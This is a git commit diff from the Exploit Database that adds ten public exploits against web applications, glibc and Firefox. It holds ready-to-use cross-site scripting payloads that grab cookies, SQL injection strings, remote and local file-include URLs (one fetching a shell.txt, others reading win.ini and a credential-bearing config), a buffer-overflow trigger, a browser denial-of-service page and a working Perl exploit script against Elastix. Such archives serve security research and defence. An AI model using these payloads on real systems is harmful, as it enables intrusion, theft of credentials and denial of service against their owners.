DB: 2015-07-19

Offensive Security · Offensive Security · commit 8762b868bfc5 · 2015-07-19T05:01:52.000Z
10 new exploits
diff --git a/files.csv b/files.csv
@@ -33963,3 +33963,13 @@ id,file,description,date,author,platform,type,port
 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
 37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0
 37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80
+37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-09,"Yakir Wizman",php,webapps,0
+37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0
+37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0
+37633,platforms/php/webapps/37633.txt,"mIRC 'projects.php' Cross Site Scripting Vulnerability",2012-08-10,TayfunBasoglu,php,webapps,0
+37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki Multiple Remote and Local File Include Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0
+37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Include Vulnerability",2012-08-10,L0n3ly-H34rT,php,webapps,0
+37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0
+37637,platforms/php/webapps/37637.pl,"Elastix 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0
+37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting Vulnerability",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0
+37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service Vulnerability",2012-08-17,"Jean Pascal Pereira",multiple,dos,0
diff --git a/platforms/cgi/webapps/37638.txt b/platforms/cgi/webapps/37638.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55082/info
+
+LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+LISTSERV 16 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL=<script>alert(document.cookie)</script> 
diff --git a/platforms/linux/local/37631.c b/platforms/linux/local/37631.c
@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/54982/info
+
+GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
+
+Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. 
+
+include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define EXPONENT "e-2147483649"
+#define SIZE 214748364
+int
+main (void)
+{
+  char *p = malloc (1 + SIZE + sizeof (EXPONENT));
+  if (p == NULL)
+    {
+      perror ("malloc");
+      exit (EXIT_FAILURE);
+    }
+  p[0] = '1';
+  memset (p + 1, '0', SIZE);
+  memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
+  double d = strtod (p, NULL);
+  printf ("%a\n", d);
+  exit (EXIT_SUCCESS);
+}
diff --git a/platforms/multiple/dos/37639.html b/platforms/multiple/dos/37639.html
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/55091/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users.
+
+Mozilla Firefox 14.01 is affected; prior versions may also be affected. 
+
+<html>
+<head>
+<title></title>
+</head>
+<body></body>
+<script>
+function e(x)
+{
+  document.body.innerHTML += x;
+  e(x + 'x');
+};
+
+e('x')
+</script>
+</html>
diff --git a/platforms/php/webapps/37630.txt b/platforms/php/webapps/37630.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54980/info
+
+Hotel Booking Portal is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Hotel Booking Portal 0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
+http://www.example.com/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
+http://www.example.com/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script> 
diff --git a/platforms/php/webapps/37632.txt b/platforms/php/webapps/37632.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54985/info
+
+Total Shop UK eCommerce CodeIgniter is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+CodeIgniter 2.1.2 is vulnerable; other versions may also be affected. 
+
+Example 1 Request: +----------------- GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1 Host: www.example.com Referer: http://www.example.com/about --- Example 1 Response: +------------------ --- SNIP --- function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1"; 
diff --git a/platforms/php/webapps/37633.txt b/platforms/php/webapps/37633.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/54989/info
+
+mIRC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/projects.php?go=maddons&offset=&order=id&sort=desc&mver=0&keywords=xss"><img src=x onerror=prompt(document.cookie);> 
diff --git a/platforms/php/webapps/37634.txt b/platforms/php/webapps/37634.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/54991/info
+
+MindTouch DekiWiki is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer or in a remote location with the privileges of the web server process. This may facilitate unauthorized access.
+
+MindTouch DekiWiki 10.1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/deki/web/deki/gui/link.php?IP=http://www.example.com/shell.txt?
+http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=http://www.example.com/shell.txt?
+http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://www.example.com/shell.txt?
+http://www.example.com/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00
+http://www.example.com/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00
+http://www.example.com/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00 
diff --git a/platforms/php/webapps/37635.txt b/platforms/php/webapps/37635.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/54992/info
+
+GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host are prone to a local file-include vulnerability because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 
+
+For GalaxyScripts Mini File Host:
+
+http://www.example.com/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
+
+For DaddyScripts Daddy's File Host:
+
+http://www.example.com/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg 
diff --git a/platforms/php/webapps/37636.txt b/platforms/php/webapps/37636.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/55062/info
+
+The ShopperPress WordPress theme is prone to an SQL-injection and multiple cross-site vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow an attacker to steal cookie-based authentication credentials, to compromise the application, to access or modify data, or to exploit latent vulnerabilities in the underlying database.
+
+ShopperPress 2.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-admin/admin.php?page=images&p=0&search=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
+
+http://www.example.com/wp-admin/admin.php?page=emails&edit=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
+
+http://www.example.com/wp-admin/admin.php?page=members&edit&order=0%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D800+height%3D800onload%3Dalert%28%22VLAB%22%29+%3C
+
+http://www.example.com/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]-- 
diff --git a/platforms/php/webapps/37637.pl b/platforms/php/webapps/37637.pl
@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/55078/info
+
+Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
+
+Elastix 2.2.0 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl -w
+
+#------------------------------------------------------------------------------------# 
+#Elastix is an Open Source Sofware to establish Unified Communications. 
+#About this concept, Elastix goal is to incorporate all the communication alternatives,
+#available at an enterprise level, into a unique solution.
+#------------------------------------------------------------------------------------#
+############################################################
+# Exploit Title: Elastix 2.2.0 LFI
+# Google Dork: :(
+# Author: cheki
+# Version:Elastix 2.2.0
+# Tested on: multiple
+# CVE : notyet
+# romanc-_-eyes ;) 
+# Discovered by romanc-_-eyes
+# vendor http://www.elastix.org/
+
+print "\t Elastix 2.2.0 LFI Exploit \n";
+print "\t code author cheki   \n";
+print "\t 0day Elastix 2.2.0  \n";
+print "\t email: anonymous17hacker{}gmail.com \n";
+
+#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
+
+use LWP::UserAgent;
+print "\n Target: https://ip ";
+chomp(my $target=<STDIN>);
+$dir="vtigercrm";
+$poc="current_language";
+$etc="etc";
+$jump="../../../../../../../..//";
+$test="amportal.conf%00";
+
+$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
+$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
+$res = $code->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
+ 
+print "\n read amportal.conf file : $answer \n\n";
+print " successful read\n";
+ 
+}
+else { 
+print "\n[-] not successful\n";
+	}
+
